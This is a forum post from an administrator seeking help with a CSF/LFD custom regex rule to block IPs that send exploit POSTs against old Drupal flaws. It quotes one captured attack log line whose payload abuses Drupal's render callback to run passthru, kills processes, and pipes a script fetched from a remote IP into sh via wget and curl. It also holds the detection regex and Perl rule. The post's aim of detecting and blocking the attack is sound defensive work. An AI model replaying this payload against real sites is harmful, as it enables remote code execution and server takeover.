regex.custom.pm to block Drupal vulnerability POSTs
Posted: 24 Oct 2018, 11:55
Hello,
I've been using CSF & LFD for years and it's done very well for me. However I'm attempting something I haven't done before and am having trouble getting it to work. I am trying to block IP addresses that are attempting to POST command lines (nohup, wget etc) into perceived Drupal vulnerabilities. The vulnerabilities are long gone but these attempts are generating significant traffic.
This is an example of the offending log line:
So, I want to block IP addresses from apache logs that match the following regexp (just attempting nohup for now):
I updated the CUSTOM1 logline in csf.conf to look like this:
And added the following to regex.custom.pm:
When I restart csf & lfd I get the following lines in lfd.log:
However this has absolutely no effect (I attempted a POST myself, plus a whole bunch of malicious ones occurred after csf & lfd were restarted).
Suspecting it might be an issue with the regexp, I made it was simple as possible, blocking any entry in the logfile containing what looks like an IP address:
Still no joy, try as I might I just cannot get csf/lfd to block me on this rule (I can access the server from a different IP so it's fine if it blocks the one I was testing from).
Are there configuration steps that are required to enable custom.regex.pm? Am I missing something here?
Any help gratefully appreciated
I've been using CSF & LFD for years and it's done very well for me. However I'm attempting something I haven't done before and am having trouble getting it to work. I am trying to block IP addresses that are attempting to POST command lines (nohup, wget etc) into perceived Drupal vulnerabilities. The vulnerabilities are long gone but these attempts are generating significant traffic.
This is an example of the offending log line:
Code: Select all
92.63.103.241 - - [24/Oct/2018:11:49:31 +0200] "POST //?q=user/password&name[%23post_render][]=passthru&name[%23markup]=kill%20-9%20-1;%20nohup%20wget%20-O%20-%20http://164.132.159.56/drupal/ups.sh%7Csh%20&;%20nohup%20curl%20%20http://164.132.159.56/drupal/ups.jpg%7Csh%20&&name[%23type]=markup HTTP/1.1" 200 30
Code: Select all
^(\d+\.\d+\.\d+\.\d+) \- \-.*POST .*nohup.*Code: Select all
CUSTOM1_LOG = "/var/log/httpd/flashbase*"Code: Select all
if (($globlogs{CUSTOM1_LOG}{$lgfile}) and ($line =~ /^(\d+\.\d+\.\d+\.\d+) \- \-.*POST .*nohup.*))/ {
return ("drupal nohup POST attack from",$1,"drupal_nohup","5","80,443","10");
}
Code: Select all
Oct 24 12:32:12 xxxx lfd[1408]: Watching /var/log/httpd/flashbase_access_log...
Oct 24 12:32:12 xxxx lfd[1408]: Watching /var/log/httpd/flashbase_error_log...
Suspecting it might be an issue with the regexp, I made it was simple as possible, blocking any entry in the logfile containing what looks like an IP address:
Code: Select all
if (($globlogs{CUSTOM1_LOG}{$lgfile}) and ($line =~ /.*(\d+\.\d+\.\d+\.\d+).*/)) {
return ("drupal nohup POST attack from",$1,"drupal_nohup","5","80,443","10");
}
Are there configuration steps that are required to enable custom.regex.pm? Am I missing something here?
Any help gratefully appreciated